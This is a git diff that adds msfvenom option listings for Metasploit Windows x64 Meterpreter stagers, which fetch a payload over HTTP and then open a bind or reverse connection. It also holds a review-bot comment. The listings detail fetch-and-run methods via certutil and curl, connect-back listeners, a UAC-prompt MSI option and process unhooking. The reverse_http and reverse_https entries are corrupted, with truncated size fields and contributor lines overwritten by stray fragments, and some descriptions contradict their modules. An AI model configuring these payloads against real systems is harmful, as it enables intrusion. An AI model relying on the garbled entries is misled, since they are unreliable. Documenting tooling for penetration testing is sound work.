+ AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + 
PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependMigrate false yes Spawns and runs shellcode in new process + PrependMigrateProc no Process to spawn and run shellcode in + SMBDirect true yes The target port is a raw SMB service (not NetBIOS) + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + VERBOSE false no Enable detailed status messages + WAIT_TIMEOUT 10 no Seconds pipe will wait for a connection + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-windows-http-x64-meterpreter-bind_tcp.txt b/msfvenom/payload_options/cmd-windows-http-x64-meterpreter-bind_tcp.txt new file mode 100644 index 0000000..aecddef --- /dev/null +++ b/msfvenom/payload_options/cmd-windows-http-x64-meterpreter-bind_tcp.txt 
@@ -0,0 +1,89 @@ + + Name: HTTP Fetch, Windows x64 Bind TCP Stager + Module: payload/cmd/windows/http/x64/meterpreter/bind_tcp + Platform: Windows + Arch: cmd +Needs Admin: No + Total size: 129 + Rank: Normal + +Provided by: + Brendan Watters + skape + sf + OJ Reeves + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) +FETCH_COMMAND CERTUTIL yes Command to fetch payload (Accepted: CURL, TFTP, CERTUTIL) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILENAME yGuJAEPwGqD no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +FETCH_WRITABLE_DIR %TEMP% yes Remote writable dir to store payload; cannot contain spaces. +LPORT 4444 yes The listen port +RHOST no The target address + + +When FETCH_COMMAND is one of CURL: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + +Description: + Fetch and execute an x64 payload from an HTTP server. + Listen for a connection (Windows x64) + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. 
+ AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + 
PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependMigrate false yes Spawns and runs shellcode in new process + PrependMigrateProc no Process to spawn and run shellcode in + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-windows-http-x64-meterpreter-bind_tcp_rc4.txt b/msfvenom/payload_options/cmd-windows-http-x64-meterpreter-bind_tcp_rc4.txt new file mode 100644 index 0000000..01b8cef --- /dev/null +++ b/msfvenom/payload_options/cmd-windows-http-x64-meterpreter-bind_tcp_rc4.txt 
@@ -0,0 +1,94 @@ + + Name: HTTP Fetch, Bind TCP Stager (RC4 Stage Encryption, Metasm) + Module: payload/cmd/windows/http/x64/meterpreter/bind_tcp_rc4 + Platform: Windows + Arch: cmd +Needs Admin: No + Total size: 129 + Rank: Normal + +Provided by: + Brendan Watters + skape + sf + OJ Reeves + hdm + mihi + max3raza + RageLtMan + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) +FETCH_COMMAND CERTUTIL yes Command to fetch payload (Accepted: CURL, TFTP, CERTUTIL) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILENAME tWVPTdjIccC no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +FETCH_WRITABLE_DIR %TEMP% yes Remote writable dir to store payload; cannot contain spaces. +LPORT 4444 yes The listen port +RC4PASSWORD msf yes Password to derive RC4 key from +RHOST no The target address + + +When FETCH_COMMAND is one of CURL: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + +Description: + Fetch and execute an x64 payload from an HTTP server. + Connect back to the attacker + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. 
+ AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + 
PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependMigrate false yes Spawns and runs shellcode in new process + PrependMigrateProc no Process to spawn and run shellcode in + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-windows-http-x64-meterpreter-bind_tcp_uuid.txt b/msfvenom/payload_options/cmd-windows-http-x64-meterpreter-bind_tcp_uuid.txt new file mode 100644 index 0000000..2180966 --- /dev/null +++ b/msfvenom/payload_options/cmd-windows-http-x64-meterpreter-bind_tcp_uuid.txt 
@@ -0,0 +1,89 @@ + + Name: HTTP Fetch, Bind TCP Stager with UUID Support (Windows x64) + Module: payload/cmd/windows/http/x64/meterpreter/bind_tcp_uuid + Platform: Windows + Arch: cmd +Needs Admin: No + Total size: 127 + Rank: Normal + +Provided by: + Brendan Watters + skape + sf + OJ Reeves + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) +FETCH_COMMAND CERTUTIL yes Command to fetch payload (Accepted: CURL, TFTP, CERTUTIL) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILENAME ZfZyuSDghd no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +FETCH_WRITABLE_DIR %TEMP% yes Remote writable dir to store payload; cannot contain spaces. +LPORT 4444 yes The listen port +RHOST no The target address + + +When FETCH_COMMAND is one of CURL: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + +Description: + Fetch and execute an x64 payload from an HTTP server. + Listen for a connection with UUID Support (Windows x64) + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. 
+ AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + 
PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependMigrate false yes Spawns and runs shellcode in new process + PrependMigrateProc no Process to spawn and run shellcode in + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-windows-http-x64-meterpreter-reverse_http.txt b/msfvenom/payload_options/cmd-windows-http-x64-meterpreter-reverse_http.txt new file mode 100644 index 0000000..75f0656 --- /dev/null +++ b/msfvenom/payload_options/cmd-windows-http-x64-meterpreter-reverse_http.txt 
@@ -0,0 +1,111 @@ + + Name: HTTP Fetch, Windows x64 Reverse HTTP Stager (wininet) + Module: payload/cmd/windows/http/x64/meterpreter/reverse_http + Platform: Windows + Arch: cmd +Needs Admin: No + Total si +Evasion options for payload/cmd/windows/http/x64/meterpreter/reverse_http: +========================= + +hen_fewer@harmonysecurity.com> + OJ Reeves + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) +FETCH_COMMAND CERTUTIL yes Command to fetch payload (Accepted: CURL, TFTP, CERTUTIL) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILENAME fXKqQJmatyB no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +FETCH_WRITABLE_DIR %TEMP% yes Remote writable dir to store payload; cannot contain spaces. +LHOST yes The local listener hostname +LPORT 8080 yes The local listener port +LURI no The HTTP Path + + +When FETCH_COMMAND is one of CURL: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + +Description: + Fetch and execute an x64 payload from an HTTP server. + Tunnel communication over HTTP (Windows x64 wininet) + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. 
+ AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + HttpCookie no An optional value to use for the Cookie HTTP header + HttpHostHeader no An optional value to use for the Host HTTP header + HttpProxyHost no An optional proxy server IP address or hostname + HttpProxyPass no An optional proxy server password Max parameter length: 63 characters + HttpProxyPort no An optional proxy server port + HttpProxyType HTTP yes The type of HTTP proxy (Accepted: HTTP, SOCKS) + HttpProxyUser no An optional proxy server username Max parameter length: 63 characters + HttpReferer no An optional value to use for the Referer HTTP header + HttpServerName Apache no The server header that the handler will send in response to requests + HttpUnknownRequestResponse

It works!

no The returned HTML response body when the handler receives a request that is not from a payload + HttpUserAgent Mozilla/5.0 (iPad; CPU OS 17_7_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Mobile/15E148 Safari/604.1 no The user-agent that the payload should use for communication Max parameter length: 255 characters + IgnoreUnknownPayloads false no Whether to drop connections from payloads using unknown UUIDs + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + OverrideLHOST no When OverrideRequestHost is set, use this value as the host name for secondary requests + OverrideLPORT no When OverrideRequestHost is set, use this value as the port number for secondary requests + OverrideRequestHost false no Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT + OverrideScheme no When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + 
PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependMigrate false yes Spawns and runs shellcode in new process + PrependMigrateProc no Process to spawn and run shellcode in + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + StagerURILength no The URI length for the stager (at least 5 bytes) + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-windows-http-x64-meterpreter-reverse_https.txt b/msfvenom/payload_options/cmd-windows-http-x64-meterpreter-reverse_https.txt new file mode 100644 index 0000000..ed6477c 
--- /dev/null +++ b/msfvenom/payload_options/cmd-windows-http-x64-meterpreter-reverse_https.txt 
@@ -0,0 +1,116 @@ + + Name: HTTP Fetch, Windows x64 Reverse HTTP Stager (wininet) + Module: payload/cmd/windows/http/x64/meterpreter/reverse_https + Platform: Windows + Arch: cmd +Needs Admin: No + Total siz +Evasion options for payload/cmd/windows/http/x64/meterpreter/reverse_https: +========================= + +n_fewer@harmonysecurity.com> + OJ Reeves + hdm + agix + rwincey + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) +FETCH_COMMAND CERTUTIL yes Command to fetch payload (Accepted: CURL, TFTP, CERTUTIL) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILENAME nMGjUZTWJ no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +FETCH_WRITABLE_DIR %TEMP% yes Remote writable dir to store payload; cannot contain spaces. +LHOST yes The local listener hostname +LPORT 8443 yes The local listener port +LURI no The HTTP Path + + +When FETCH_COMMAND is one of CURL: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + +Description: + Fetch and execute an x64 payload from an HTTP server. + Tunnel communication over HTTP (Windows x64 wininet) + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. 
+ AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + HttpCookie no An optional value to use for the Cookie HTTP header + HttpHostHeader no An optional value to use for the Host HTTP header + HttpProxyHost no An optional proxy server IP address or hostname + HttpProxyPass no An optional proxy server password Max parameter length: 63 characters + HttpProxyPort no An optional proxy server port + HttpProxyType HTTP yes The type of HTTP proxy (Accepted: HTTP, SOCKS) + HttpProxyUser no An optional proxy server username Max parameter length: 63 characters + HttpReferer no An optional value to use for the Referer HTTP header + HttpServerName Apache no The server header that the handler will send in response to requests + HttpUnknownRequestResponse

It works!

no The returned HTML response body when the handler receives a request that is not from a payload + HttpUserAgent Mozilla/5.0 (Macintosh; Intel Mac OS X 14.7; rv:133.0) Gecko/20100101 Firefox/133.0 no The user-agent that the payload should use for communication Max parameter length: 255 characters + IgnoreUnknownPayloads false no Whether to drop connections from payloads using unknown UUIDs + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + OverrideLHOST no When OverrideRequestHost is set, use this value as the host name for secondary requests + OverrideLPORT no When OverrideRequestHost is set, use this value as the port number for secondary requests + OverrideRequestHost false no Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT + OverrideScheme no When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to 
automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependMigrate false yes Spawns and runs shellcode in new process + PrependMigrateProc no Process to spawn and run shellcode in + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + SSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + StagerURILength no The URI length for the stager (at least 5 bytes) + StagerVerifySSLCert false no Whether to verify the SSL certificate in Meterpreter + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + 
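Review bot: the reverse_https dump has the same corruption as the reverse_http one: "Total siz" is truncated and the Rank and Provided-by lines are overwritten by "Evasion options for payload/cmd/windows/http/x64/meterpreter/reverse_https: =====" followed by the fragment "n_fewer@harmonysecurity.com>", so the size and the first contributor entries are lost. Regenerate this file from a single clean capture before merging. Two further points a reader of this dump will trip over: the Name and Description say "Reverse HTTP Stager (wininet)" / "Tunnel communication over HTTP" even though the module is reverse_https (LPORT defaults to 8443 and SSLVersion / StagerVerifySSLCert are present), which is upstream wording worth flagging in the file; and StagerVerifySSLCert defaults to false, so the TLS channel is not pinned to HandlerSSLCert unless the operator enables it.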
diff --git a/msfvenom/payload_options/cmd-windows-http-x64-meterpreter-reverse_named_pipe.txt b/msfvenom/payload_options/cmd-windows-http-x64-meterpreter-reverse_named_pipe.txt new file mode 100644 index 0000000..c0b1c2d --- /dev/null +++ b/msfvenom/payload_options/cmd-windows-http-x64-meterpreter-reverse_named_pipe.txt 
